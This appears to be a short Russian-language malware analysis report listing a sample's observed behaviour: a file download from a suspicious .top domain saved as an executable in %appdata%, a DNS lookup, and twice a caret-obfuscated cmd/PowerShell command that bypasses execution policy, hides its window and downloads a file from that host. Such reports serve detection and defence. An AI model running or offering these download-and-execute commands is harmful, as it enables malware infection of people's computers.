Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oW^e^Rs^HE^ll.^exe ^-EX^ecutio^NPo^li^C^y^ ^By^P^aSS^ -NoProF^ILE^ ^-WINd^Ow^s^tyl^E H^iDDE^n^ (NeW-^oBj^eCT ^SY^STem.^n^eT.w^ebc^LiE^NT^).Dow^n^lOaD^f^ile('http://footarepu....
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "P^oW^e^Rs^HE^ll.^exe ^-EX^ecutio^NPo^li^C^y^ ^By^P^aSS^ -NoProF^ILE^ ^-WINd^Ow^s^tyl^E H^iDDE^n^ (NeW-^oBj^eCT ^SY^STem.^n^eT.w^ebc^LiE^NT^).Dow^n^lOaD^f^ile('http://footarepu....' (со скрытым окном)